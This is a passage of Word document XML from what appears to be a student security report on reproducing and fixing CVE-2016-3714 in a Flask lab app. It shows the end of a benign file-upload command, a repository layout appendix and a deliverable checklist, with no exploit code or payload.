          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  -F "file_upload=@/mnt/e/MyFile/IS-Lab/Work-1/cve/CVE-2016-3714/exploit/normal.png;filename=normal.png;type=image/png"</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>docker compose down</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Appendix B.  Repository Layout</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:keepLines/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="BFBFBF"/>
          <w:left w:val="single" w:sz="4" w:space="1" w:color="BFBFBF"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="BFBFBF"/>
          <w:right w:val="single" w:sz="4" w:space="1" w:color="BFBFBF"/>
        </w:pBdr>
        <w:spacing w:before="80" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="142" w:right="142"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Work-1/</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>|-- app/                     Flask application (factory, auth, API, DB, security, seed)</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>|-- tests/                   14 pytest tests</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>|-- .github/workflows/ci.yml CI pipeline</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>|-- cve/CVE-2016-3714/       exploit, fixed files, evidence, screenshots</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>|-- report/Work-1-Report.md  Markdown source of this report</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>|-- report/Work-1-Report.docx and .pdf (delivered copy)</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>|-- requirements.txt / requirements-dev.txt</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>`-- README.md                API, security and CI documentation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Appendix C.  Work 1 Deliverable Checklist</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val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3515"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Deliverable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1247"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Location / note</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3515"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Public repository link</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1247"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Done</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>https://github.com/EggplantPig/WeiLixuan23320107-IS-Work-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3515"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Complete README text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1247"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Done</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>README.md (English)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3515"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Actions SAST/SCA screenshot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1247"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Done</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>cve/CVE-2016-3714/screenshots/04, 05 and screenshots/09</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3515"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>CVE ID and description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1247"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Done</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Section 4.1 and cve/CVE-2016-3714/README.md</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3515"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Reproduction steps and screenshots</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1247"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Done</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Section 4.3 and Figures 3-5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3515"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Root-cause explanation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1247"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Done</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Section 4.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3515"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Fix explanation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1247"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Done</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Section 4.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3515"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Proof that the attack fails after the fix</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1247"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Done</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Section 4.6 and Figure 4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3515"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Last successful pipeline link</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1247"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Done</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>https://github.com/EggplantPig/WeiLixuan23320107-IS-Work-1/actions/runs/40357227529</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3515"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Fixed files</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1247"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Done</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>cve/CVE-2016-3714/fixed/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3515"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Structured report with title page</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1247"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Done</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="80" w:type="dxa"/>
